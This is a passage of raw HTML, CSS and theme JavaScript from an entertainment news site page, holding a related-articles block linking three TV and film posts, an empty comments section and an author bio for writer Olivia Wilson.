.td_module_flex_1 .entry-review-stars{display:none}.tdi_26 .td_module_flex_1 .td-icon-star,.tdi_26 .td_module_flex_1 .td-icon-star-empty,.tdi_26 .td_module_flex_1 .td-icon-star-half{font-size:15px}.tdi_26 .td_module_flex_4 .entry-review-stars{display:none}.tdi_26 .td_module_flex_4 .td-icon-star,.tdi_26 .td_module_flex_4 .td-icon-star-empty,.tdi_26 .td_module_flex_4 .td-icon-star-half{font-size:15px}.tdi_26 .td_module_flex_1 .td-module-comments{display:none}.tdi_26 .td_module_flex_4 .td-module-comments{display:none}.tdi_26 .td_module_flex_1 .td-module-thumb a:after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;background:-webkit-linear-gradient(0deg,rgba(0,0,0,0.7),rgba(0,0,0,0.3) 35%,rgba(0,0,0,0) 50%,rgba(0,0,0,0));background:linear-gradient(0deg,rgba(0,0,0,0.7),rgba(0,0,0,0.3) 35%,rgba(0,0,0,0) 50%,rgba(0,0,0,0))}.tdi_26 .td_module_flex_1 .td-module-title a{color:#ffffff}.tdi_26 .td_module_flex_1 .td-post-category:hover{background-color:rgba(255,255,255,0)!important}.tdi_26.td_with_ajax_pagination .td-next-prev-wrap a:hover,.tdi_26 .td-load-more-wrap a:hover{background-color:#85c442!important;border-color:#85c442!important;border-color:#85c442!important}.tdi_26 .td-block-title a,.tdi_26 .td-block-title span{font-family:Rubik!important;font-size:17px!important;font-weight:500!important;text-transform:uppercase!important}.tdi_26 .td-load-more-wrap a{font-family:Rubik!important}html:not([class*='ie']) .tdi_26 .entry-thumb:after{background:rgba(112,204,63,0.3)}@media (min-width:767px){.tdi_26 .td_module_wrap{width:33.33333333%;float:left}.rtl .tdi_26 .td_module_wrap{float:right}}@media (min-width:767px){.tdi_26 .td_module_wrap:nth-child(3n+1){clear:both}}@media (min-width:767px){.tdi_26 .td_module_wrap:nth-last-child(-n+3){margin-bottom:0!important;padding-bottom:0!important}.tdi_26 .td_module_wrap:nth-last-child(-n+3) .td-module-container:before{display:none}}@media (min-width:1141px){html:not([class*='ie']) .tdi_26 .entry-thumb:after{content:'';width:100%;height:100%;position:absolute;top:0;left:0;opacity:0;transition:opacity 1s ease;-webkit-transition:opacity 1s ease;mix-blend-mode:color}html:not([class*='ie']) .tdi_26 .td-module-container:hover .entry-thumb:after{opacity:1}}@media (min-width:1019px) and (max-width:1140px){.tdi_26 .td_module_wrap{padding-left:2px;padding-right:2px}.tdi_26 .td_block_inner{margin-left:-2px;margin-right:-2px}.tdi_26 .td_module_flex_1 .td-module-meta-info{padding:12px 8px}.tdi_26 .td_module_flex_1 .entry-title{margin:8px 0 0 0}}@media (min-width:768px) and (max-width:1018px){.tdi_26 .td_module_wrap{padding-left:1.5px;padding-right:1.5px}.tdi_26 .td_block_inner{margin-left:-1.5px;margin-right:-1.5px}.tdi_26 .td_module_flex_1 .td-module-meta-info{padding:10px 5px}.tdi_26 .td_module_flex_1 .entry-title{margin:6px 0 0 0;font-size:11px!important}.tdi_26 .td-block-title a,.tdi_26 .td-block-title span{font-size:15px!important}}@media (max-width:767px){.tdi_26 .td_module_wrap{padding-left:0px;padding-right:0px}.tdi_26 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_26 .td_module_flex_1{padding-bottom:1.5px;margin-bottom:1.5px}.tdi_26 .td_module_flex_1 .td-module-container:before{bottom:-1.5px}.tdi_26 .td_module_flex_1 .td-image-wrap{padding-bottom:110%}.ie10 .tdi_26 .td_module_flex_1 .td-image-container,.ie11 .tdi_26 .td_module_flex_1 .td-image-container{flex:0 0 auto}.tdi_26 .td_module_flex_1 .entry-title{font-size:17px!important}.tdi_26 .td_module_flex_1 .td-post-category{font-size:13px!important}}</style><script>var block_tdi_26 = new tdBlock();
block_tdi_26.id = "tdi_26";
block_tdi_26.atts = '{"image_align":"center","meta_info_align":"bottom","color_overlay":"eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiJyZ2JhKDAsMCwwLDApIiwiY29sb3IyIjoicmdiYSgwLDAsMCwwLjcpIiwibWl4ZWRDb2xvcnMiOlt7ImNvbG9yIjoicmdiYSgwLDAsMCwwLjMpIiwicGVyY2VudGFnZSI6MzV9LHsiY29sb3IiOiJyZ2JhKDAsMCwwLDApIiwicGVyY2VudGFnZSI6NTB9XSwiY3NzIjoiYmFja2dyb3VuZDogLXdlYmtpdC1saW5lYXItZ3JhZGllbnQoMGRlZyxyZ2JhKDAsMCwwLDAuNykscmdiYSgwLDAsMCwwLjMpIDM1JSxyZ2JhKDAsMCwwLDApIDUwJSxyZ2JhKDAsMCwwLDApKTtiYWNrZ3JvdW5kOiBsaW5lYXItZ3JhZGllbnQoMGRlZyxyZ2JhKDAsMCwwLDAuNykscmdiYSgwLDAsMCwwLjMpIDM1JSxyZ2JhKDAsMCwwLDApIDUwJSxyZ2JhKDAsMCwwLDApKTsiLCJjc3NQYXJhbXMiOiIwZGVnLHJnYmEoMCwwLDAsMC43KSxyZ2JhKDAsMCwwLDAuMykgMzUlLHJnYmEoMCwwLDAsMCkgNTAlLHJnYmEoMCwwLDAsMCkifQ==","image_margin":"0","modules_on_row":"33.33333333%","columns":"33.33333333%","meta_info_align1":"image","limit":"3","modules_category":"above","show_author2":"none","show_date2":"none","show_review2":"none","show_com2":"none","show_excerpt2":"none","show_excerpt1":"none","show_com1":"none","show_review1":"none","show_date1":"none","show_author1":"none","meta_info_horiz1":"content-horiz-center","modules_space1":"eyJhbGwiOiIwIiwicGhvbmUiOiIzIn0=","columns_gap":"eyJhbGwiOiI1IiwicG9ydHJhaXQiOiIzIiwibGFuZHNjYXBlIjoiNCIsInBob25lIjoiMCJ9","image_height1":"eyJhbGwiOiIxMjAiLCJwaG9uZSI6IjExMCJ9","meta_padding1":"eyJhbGwiOiIxNXB4IDEwcHgiLCJwb3J0cmFpdCI6IjEwcHggNXB4IiwibGFuZHNjYXBlIjoiMTJweCA4cHgifQ==","art_title1":"eyJhbGwiOiIxMHB4IDAgMCAwIiwicG9ydHJhaXQiOiI2cHggMCAwIDAiLCJsYW5kc2NhcGUiOiI4cHggMCAwIDAifQ==","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","title_txt":"#ffffff","all_underline_color1":"","f_title1_font_family":"712","f_title1_font_line_height":"1.2","f_title1_font_size":"eyJhbGwiOiIxNSIsInBvcnRyYWl0IjoiMTEiLCJwaG9uZSI6IjE3In0=","f_title1_font_weight":"500","f_title1_font_transform":"","f_cat1_font_transform":"uppercase","f_cat1_font_size":"eyJhbGwiOiIxMSIsInBob25lIjoiMTMifQ==","f_cat1_font_weight":"500","f_cat1_font_family":"712","modules_category_padding1":"0","category_id":"_current_cat","ajax_pagination":"next_prev","f_more_font_family":"712","f_more_font_transform":"","f_more_font_weight":"","sort":"","tdc_css":"eyJhbGwiOnsiZGlzcGxheSI6IiJ9LCJwb3J0cmFpdCI6eyJkaXNwbGF5IjoiIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3NjgsInBob25lIjp7Im1hcmdpbi1ib3R0b20iOiI0MCIsImRpc3BsYXkiOiIifSwicGhvbmVfbWF4X3dpZHRoIjo3Njd9","custom_title":"Related Articles","block_template_id":"td_block_template_8","image_size":"","cat_txt":"#ffffff","f_header_font_family":"712","f_header_font_size":"eyJhbGwiOiIxNyIsInBvcnRyYWl0IjoiMTUifQ==","f_header_font_transform":"uppercase","f_header_font_weight":"500","mix_type_h":"color","mix_color_h":"rgba(112,204,63,0.3)","pag_h_bg":"#85c442","pag_h_border":"#85c442","border_color":"#71ef47","block_type":"td_flex_block_4","separator":"","custom_url":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","mc1_el":"","mc4_tl":"","mc4_title_tag":"","mc4_el":"","post_ids":"-75891","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","popular_by_date":"","linked_posts":"","favourite_only":"","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","h_effect":"","modules_border_size1":"","modules_border_style1":"","modules_border_color1":"#eaeaea","modules_divider1":"","modules_divider_color1":"#eaeaea","image_alignment1":"50","image_radius1":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon1":"","video_icon_pos1":"center","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","meta_width1":"","meta_margin1":"","meta_info_border_radius1":"","modules_category_margin1":"","modules_cat_border1":"","modules_category_radius1":"0","show_cat1":"inline-block","modules_extra_cat1":"","author_photo":"","author_photo_size1":"","author_photo_space1":"","author_photo_radius1":"","review_space1":"","review_size1":"2.5","review_distance1":"","art_excerpt1":"","excerpt_middle":"","show_audio1":"block","hide_audio":"","art_audio1":"","art_audio_size1":"1.5","m_padding2":"","modules_space2":"26","modules_border_size2":"","modules_border_style2":"","modules_border_color2":"#eaeaea","modules_divider2":"","modules_divider_color2":"#eaeaea","image_size3":"","image_alignment2":"50","image_width2":"","image_height2":"","image_floated2":"float_left","image_radius2":"","hide_image3":"","show_favourites2":"","fav_size2":"2","fav_space2":"","fav_ico_color2":"","fav_ico_color_h2":"","fav_bg2":"","fav_bg_h2":"","fav_shadow2_shadow_header":"","fav_shadow2_shadow_title":"Shadow","fav_shadow2_shadow_size":"","fav_shadow2_shadow_offset_horizontal":"","fav_shadow2_shadow_offset_vertical":"","fav_shadow2_shadow_spread":"","fav_shadow2_shadow_color":"","video_icon2":"","video_popup3":"yes","video_rec3":"","video_rec_title3":"","video_rec_color3":"","autoplay_vid3":"yes","show_vid_t3":"block","vid_t_margin3":"","vid_t_padding3":"","meta_info_horiz2":"content-horiz-left","meta_width2":"","meta_margin2":"","meta_padding2":"","meta_info_border_radius2":"","art_title2":"","modules_category3":"","modules_category_margin2":"","modules_category_padding2":"","modules_cat_border2":"","modules_category_radius2":"0","show_cat2":"inline-block","modules_extra_cat2":"","author_photo3":"","author_photo_size2":"","author_photo_space2":"","author_photo_radius2":"","review_space2":"","review_size2":"2.5","review_distance2":"","art_excerpt2":"","excerpt_middle3":"","show_audio2":"block","hide_audio3":"","art_audio2":"","art_audio_size2":"1","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_spacing":"","f_more_":"","f_title1_font_header":"","f_title1_font_title":"Article title 1","f_title1_font_settings":"","f_title1_font_style":"","f_title1_font_spacing":"","f_title1_":"","f_cat1_font_title":"Article category tag 1","f_cat1_font_settings":"","f_cat1_font_line_height":"","f_cat1_font_style":"","f_cat1_font_spacing":"","f_cat1_":"","f_meta1_font_title":"Article meta info 1","f_meta1_font_settings":"","f_meta1_font_family":"","f_meta1_font_size":"","f_meta1_font_line_height":"","f_meta1_font_style":"","f_meta1_font_weight":"","f_meta1_font_transform":"","f_meta1_font_spacing":"","f_meta1_":"","f_ex1_font_title":"Article excerpt 1","f_ex1_font_settings":"","f_ex1_font_family":"","f_ex1_font_size":"","f_ex1_font_line_height":"","f_ex1_font_style":"","f_ex1_font_weight":"","f_ex1_font_transform":"","f_ex1_font_spacing":"","f_ex1_":"","f_title2_font_title":"Article title 2","f_title2_font_settings":"","f_title2_font_family":"","f_title2_font_size":"","f_title2_font_line_height":"","f_title2_font_style":"","f_title2_font_weight":"","f_title2_font_transform":"","f_title2_font_spacing":"","f_title2_":"","f_cat2_font_title":"Article category tag 2","f_cat2_font_settings":"","f_cat2_font_family":"","f_cat2_font_size":"","f_cat2_font_line_height":"","f_cat2_font_style":"","f_cat2_font_weight":"","f_cat2_font_transform":"","f_cat2_font_spacing":"","f_cat2_":"","f_meta2_font_title":"Article meta info 2","f_meta2_font_settings":"","f_meta2_font_family":"","f_meta2_font_size":"","f_meta2_font_line_height":"","f_meta2_font_style":"","f_meta2_font_weight":"","f_meta2_font_transform":"","f_meta2_font_spacing":"","f_meta2_":"","f_ex2_font_title":"Article excerpt 2","f_ex2_font_settings":"","f_ex2_font_family":"","f_ex2_font_size":"","f_ex2_font_line_height":"","f_ex2_font_style":"","f_ex2_font_weight":"","f_ex2_font_transform":"","f_ex2_font_spacing":"","f_ex2_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","meta_bg":"","title_txt_hover":"","all_underline_height1":"","cat_txt_hover":"","cat_border1":"","cat_border_hover1":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","meta_bg2":"","title_txt2":"","title_txt_hover2":"","all_underline_height2":"","all_underline_color2":"#000","cat_bg2":"","cat_bg_hover2":"","cat_txt2":"","cat_txt_hover2":"","cat_border2":"","cat_border_hover2":"","author_txt2":"","author_txt_hover2":"","date_txt2":"","ex_txt2":"","com_bg2":"","com_txt2":"","rev_txt2":"","audio_btn_color2":"","audio_time_color2":"","audio_bar_color2":"","audio_bar_curr_color2":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_border":"","btn_title":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":2,"header_color":"","color_preset":"","border_top":"","class":"tdi_26","tdc_css_class":"tdi_26","tdc_css_class_style":"tdi_26_rand_style"}';
block_tdi_26.td_column_number = "2";
block_tdi_26.block_type = "td_flex_block_4";
block_tdi_26.post_count = "3";
block_tdi_26.found_posts = "10360";
block_tdi_26.header_color = "";
block_tdi_26.ajax_pagination_infinite_stop = "";
block_tdi_26.max_num_pages = "3454";
tdBlocksArray.push(block_tdi_26);
</script><div class="td-block-title-wrap"><h4 class="td-block-title"><span>Related Articles</span></h4></div><div id="tdi_26" class="td_block_inner td-mc1-wrap">
<div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
<div class="td-module-container td-category-pos-above">
<div class="td-image-container">
<div class="td-module-thumb"><a href="https://www.tvacute.com/unprisoned-season-3/" rel="bookmark" class="td-image-wrap " title="Will there be UnPrisoned Season 3 On Hulu?"><span class="entry-thumb td-thumb-css td-animation-stack-type0-1" data-type="css_image" data-img-url="https://www.tvacute.com/wp-content/uploads/2024/09/UnPrisoned-season-3-1-696x379.avif"></span></a></div> </div>
<div class="td-module-meta-info">
<a href="https://www.tvacute.com/category/hulu/unprisoned/" class="td-post-category" data-wpel-link="internal" target="_self" rel="follow">“UnPrisoned”</a>
<h3 class="entry-title td-module-title"><a href="https://www.tvacute.com/unprisoned-season-3/" rel="bookmark follow" title="Will there be UnPrisoned Season 3 On Hulu?" data-wpel-link="internal" target="_self">Will there be UnPrisoned Season 3 On Hulu?</a></h3>
</div>
</div>
</div>
<div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
<div class="td-module-container td-category-pos-above">
<div class="td-image-container">
<div class="td-module-thumb"><a href="https://www.tvacute.com/kendy-howard-kids-brooke-wilkins-and-wyatt-howard/" rel="bookmark" class="td-image-wrap " title="Kendy Howard’s Kids: Where Are Brooke Wilkins and Wyatt Howard?"><span class="entry-thumb td-thumb-css td-animation-stack-type0-1" data-type="css_image" data-img-url="https://www.tvacute.com/wp-content/uploads/2024/09/Brooke-Wilkins-and-Wyatt-Howard-696x453.avif"></span></a></div> </div>
<div class="td-module-meta-info">
<a href="https://www.tvacute.com/category/cbs/48-hours/" class="td-post-category" data-wpel-link="internal" target="_self" rel="follow">48 Hours</a>
<h3 class="entry-title td-module-title"><a href="https://www.tvacute.com/kendy-howard-kids-brooke-wilkins-and-wyatt-howard/" rel="bookmark follow" title="Kendy Howard’s Kids: Where Are Brooke Wilkins and Wyatt Howard?" data-wpel-link="internal" target="_self">Kendy Howard’s Kids: Where Are Brooke Wilkins and Wyatt Howard?</a></h3>
</div>
</div>
</div>
<div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
<div class="td-module-container td-category-pos-above">
<div class="td-image-container">
<div class="td-module-thumb"><a href="https://www.tvacute.com/alice-the-mad-hatter/" rel="bookmark" class="td-image-wrap " title="ALICE &amp; THE MAD HATTER NOW IN PRODUCTION"><span class="entry-thumb td-thumb-css td-animation-stack-type0-1" data-type="css_image" data-img-url="https://www.tvacute.com/wp-content/uploads/2024/09/ALICE-MAD-HATTER-696x489.avif"></span></a></div> </div>
<div class="td-module-meta-info">
<a href="https://www.tvacute.com/category/movie-news/alice-the-mad-hatter/" class="td-post-category" data-wpel-link="internal" target="_self" rel="follow">ALICE &amp; THE MAD HATTER</a>
<h3 class="entry-title td-module-title"><a href="https://www.tvacute.com/alice-the-mad-hatter/" rel="bookmark follow" title="ALICE &amp; THE MAD HATTER NOW IN PRODUCTION" data-wpel-link="internal" target="_self">ALICE &amp; THE MAD HATTER NOW IN PRODUCTION</a></h3>
</div>
</div>
</div>
</div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_26" data-td_block_id="tdi_26"><i class="td-next-prev-icon td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_26" data-td_block_id="tdi_26"><i class="td-next-prev-icon td-icon-font td-icon-menu-right"></i></a></div></div>
<script>

var tdb_login_sing_in_shortcode="on";

</script>
<div class="td_block_wrap tdb_single_comments tdi_27 tdb-comm-layout2 td-pb-border-top td_block_template_8" data-td-block-uid="tdi_27">
<style>.tdi_27 .td-block-title>*:before,.tdi_27 .td-block-title>*:after{background-color:#71ef47!important}</style>
<style>.tdb_single_comments input[type=text]{min-height:34px;height:auto}.tdb_single_comments .comments,.tdb_single_comments .comment-respond:last-child,.tdb_single_comments .form-submit{margin-bottom:0}.is-visually-hidden{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.tdb-comm-layout3 form,.tdb-comm-layout5 form{display:flex;flex-wrap:wrap}.tdb-comm-layout3 .td-form-comment,.tdb-comm-layout5 .td-form-comment,.tdb-comm-layout3 .form-submit,.tdb-comm-layout5 .form-submit{flex:0 0 100%;order:1}.tdb-comm-layout3 .td-form-author,.tdb-comm-layout3 .td-form-email,.tdb-comm-layout3 .td-form-url{flex:0 0 32%}.tdb-comm-layout5 .td-form-author,.tdb-comm-layout5 .td-form-email{flex:0 0 49%}.tdb-comm-layout5 .td-form-url{flex:0 0 100%}.tdb-comm-leave_reply_top .comments{display:flex;flex-direction:column}.tdb-comm-leave_reply_top .td-comments-title{order:0;margin-bottom:14px}.tdb-comm-leave_reply_top .comment-respond .form-submit{order:1;margin-bottom:21px}.tdb-comm-leave_reply_top .comment-list{order:2}.tdb-comm-leave_reply_top .comment-pagination{order:3}.tdi_27 cite a:hover{color:#fb4c7d}.tdi_27 .comment-link{display:inline-block}.tdi_27 .comment-reply-link:hover,.tdi_27 #cancel-comment-reply-link:hover,.tdi_27 .logged-in-as a:hover{color:#000000}.tdi_27 .comment{border-bottom-style:dashed}.tdi_27 .comment .children{border-top-style:dashed}.tdi_27 .td-comments-title a,.tdi_27 .td-comments-title span{font-family:Rubik!important;font-size:17px!important;font-weight:500!important;text-transform:uppercase!important}.tdi_27 cite{font-family:Rubik!important;font-size:15px!important;font-weight:500!important;text-transform:capitalize!important}.tdi_27 .comment-link,.tdi_27 .comment-edit-link{font-family:Rubik!important;font-size:11px!important;font-weight:400!important}.tdi_27 .comment-content p{font-family:Rubik!important;font-size:13px!important;font-weight:400!important}.tdi_27 .comment-reply-link{font-family:Rubik!important;font-weight:400!important;text-transform:uppercase!important}.tdi_27 .comment-reply-title{font-family:Rubik!important;font-size:15px!important;font-weight:500!important;text-transform:uppercase!important}.tdi_27 input[type=text],.tdi_27 textarea{font-family:Rubik!important;font-size:13px!important;font-weight:400!important}.tdi_27 .comment-form .submit{font-family:Rubik!important;font-size:13px!important;font-weight:400!important;text-transform:uppercase!important}.tdi_27 .comment-form-cookies-consent label,.tdi_27 .logged-in-as,.tdi_27 .logged-in-as a,.tdi_27 .td-closed-comments{font-family:Rubik!important;font-size:13px!important;line-height:1.2!important;font-weight:400!important}@media (min-width:767px){.tdb-comm-layout2 form,.tdb-comm-layout4 form{margin:0 -10px}.tdb-comm-layout2 .logged-in-as,.tdb-comm-layout4 .logged-in-as,.tdb-comm-layout2 .comment-form-input-wrap,.tdb-comm-layout4 .comment-form-input-wrap,.tdb-comm-layout2 .form-submit,.tdb-comm-layout4 .form-submit,.tdb-comm-layout2 .comment-respond p,.tdb-comm-layout4 .comment-respond p{padding:0 10px}.tdb-comm-layout2 .td-form-author,.tdb-comm-layout2 .td-form-email{float:left;width:33.3333%}.tdb-comm-layout2 .td-form-url{width:33.3333%}.tdb-comm-layout2 .td-form-url{float:left}.tdb-comm-layout4 .td-form-author,.tdb-comm-layout4 .td-form-email{float:left;width:50%}.tdb-comm-layout3 .td-form-author,.tdb-comm-layout5 .td-form-author,.tdb-comm-layout3 .td-form-email{margin-right:2%}}@media (max-width:767px){.tdb-comm-layout3 .td-form-author,.tdb-comm-layout3 .td-form-email,.tdb-comm-layout3 .td-form-url,.tdb-comm-layout5 .td-form-author,.tdb-comm-layout5 .td-form-email{flex:0 0 100%}}@media (min-width:768px) and (max-width:1018px){.tdi_27 .td-comments-title a,.tdi_27 .td-comments-title span{font-size:15px!important}.tdi_27 cite{font-size:13px!important}.tdi_27 .comment-reply-title{font-size:13px!important}}</style><div class="tdb-block-inner td-fix-index"><div class="comments" id="comments"></div></div></div><div class="tdb-author-box td_block_wrap tdb_single_author_box tdi_28 tdb-content-vert-top td-pb-border-top td_block_template_1" data-td-block-uid="tdi_28">
<style>@media (max-width:767px){.tdi_28{justify-content:center!important;text-align:center!important}}</style>
<style>.tdb-author-box .tdb-author-photo,.tdb-author-box .tdb-author-info{display:table-cell;vertical-align:top}.tdb-author-box .tdb-author-photo img{display:block}.tdb-author-box .tdb-author-counters span{display:inline-block;background-color:#222;margin:0 10px 0 0;padding:5px 10px 4px;font-family:'Roboto',sans-serif;font-size:11px;font-weight:700;line-height:1;color:#fff}.tdb-author-box .tdb-author-name,.tdb-author-box .tdb-author-url{display:block}.tdb-author-box .tdb-author-name{margin:7px 0 8px;font-family:'Open Sans','Open Sans Regular',sans-serif;font-size:15px;line-height:21px;font-weight:700;color:#222}.tdb-author-box .tdb-author-name:hover{color:#4db2ec}.tdb-author-box .tdb-author-url{margin-bottom:6px;font-size:11px;font-style:italic;line-height:21px;color:#444}.tdb-author-box .tdb-author-url:hover{color:#4db2ec}.tdb-author-box .tdb-author-descr{font-size:12px}.tdb-author-box .tdb-author-social{margin-top:4px}.tdb-author-box .tdb-social-item{position:relative;display:inline-block;-webkit-transition:all 0.2s;transition:all 0.2s;text-align:center;-webkit-transform:translateZ(0);transform:translateZ(0)}.tdb-author-box .tdb-social-item:last-child{margin-right:0!important}.tdb-author-box .tdb-social-item i{color:#000;-webkit-transition:all 0.2s;transition:all 0.2s}.tdb-author-box .tdb-social-item:hover i{color:#000}.tdi_28{padding:20px;border:1px solid #ededed}.tdi_28 .tdb-author-info{width:auto;padding-bottom:0;padding-left:20px}.tdi_28 .tdb-author-photo{width:120px;transform:translateZ(0);-webkit-transform:translateZ(0);pointer-events:auto}.tdi_28 .tdb-author-name{color:#fb4c7d;margin:5px 0 10px 0;font-family:Rubik!important;font-size:15px!important;line-height:1.2!important;font-weight:500!important;text-transform:capitalize!important}.tdi_28 .tdb-social-item i{font-size:15px;vertical-align:middle;line-height:15px;color:#fb4c7d}.tdi_28 .tdb-social-item i.td-icon-twitter,.tdi_28 .tdb-social-item i.td-icon-linkedin,.tdi_28 .tdb-social-item i.td-icon-pinterest,.tdi_28 .tdb-social-item i.td-icon-blogger,.tdi_28 .tdb-social-item i.td-icon-vimeo{font-size:12px}.tdi_28 .tdb-social-item{min-width:15px;height:15px;margin:10px 20px 10px 0}.tdi_28 .tdb-author-url{font-family:Rubik!important;font-size:11px!important;line-height:1!important;font-weight:400!important}.tdi_28 .tdb-author-descr{font-family:Rubik!important;font-size:13px!important;line-height:1.4!important;font-weight:400!important}.tdi_28 .tdb-author-photo:hover:before{opacity:0}@media (min-width:1019px) and (max-width:1140px){.tdi_28{border:1px solid #ededed}}@media (min-width:768px) and (max-width:1018px){.tdi_28{padding:15px}.tdi_28{border:1px solid #ededed}.tdi_28 .tdb-author-photo{width:80px;transform:translateZ(0);-webkit-transform:translateZ(0)}.tdi_28 .tdb-author-info{padding-bottom:0;padding-left:15px}.tdi_28 .tdb-author-name{margin:3px 0 8px 0;font-size:13px!important}.tdi_28 .tdb-author-descr{font-size:11px!important}}@media (max-width:767px){.tdi_28{border:1px solid #ededed}.tdi_28 .tdb-author-photo{display:inline-block;width:90px;transform:translateZ(0);-webkit-transform:translateZ(0)}.tdi_28 .tdb-author-info{display:inline-block;width:100%;padding-top:20px;padding-left:0}}</style><div class="tdb-block-inner td-fix-index"><a href="https://www.tvacute.com/author/admin188/" class="tdb-author-photo" title="Olivia Wilson" data-wpel-link="internal" target="_self" rel="follow"><img alt="Olivia Wilson" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-96x96.jpg&amp;nocache=1 2x" class="avatar avatar-96 photo td-animation-stack-type0-1" height="96" width="96" decoding="async" data-lazy-src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-96x96.jpg&amp;nocache=1"><noscript><img alt='Olivia Wilson' src='https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-96x96.jpg&amp;nocache=1' srcset='https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-96x96.jpg&amp;nocache=1 2x' class='avatar avatar-96 photo' height='96' width='96' decoding='async'/></noscript></a><div class="tdb-author-info"><a href="https://www.tvacute.com/author/admin188/" class="tdb-author-name" data-wpel-link="internal" target="_self" rel="follow">Olivia Wilson</a><a href="https://www.tvacute.com/" class="tdb-author-url" data-wpel-link="internal" target="_self" rel="follow">https://www.tvacute.com/</a><div class="tdb-author-descr">Olivia Wilson is the senior news writer for TV Acute. She spends too much money on collectables and is enamored with movies, comics, and television series. She loves binge-watching and can spend hours talking about movies and TV shows. She can immerse herself into a good story no matter the genre or form and only come out from it when she's had her fill. When she's not writing, she's probably cooking or exploring new places. You can follow her daily exploits on Twitter and Facebook.</div><div class="tdb-author-social"><a href="tvacute" target="_self" title="Facebook" class="tdb-social-item" data-wpel-link="internal" rel="follow"><i class="td-icon-font td-icon-facebook"></i></a><a href="https://twitter.com/tvacute" target="_blank" title="Twitter" class="tdb-social-item" data-wpel-link="external" rel="nofollow external noopener noreferrer"><i class="td-icon-font td-icon-twitter"></i></a><a href="tvacute" target="_self" title="Youtube" class="tdb-social-item" data-wpel-link="internal" rel="follow"><i class="td-icon-font td-icon-youtube"></i></a></div></div></div></div></div></div><div class="vc_column tdi_30  wpb_column vc_column_container tdc-column td-pb-span4 td-is-sticky">
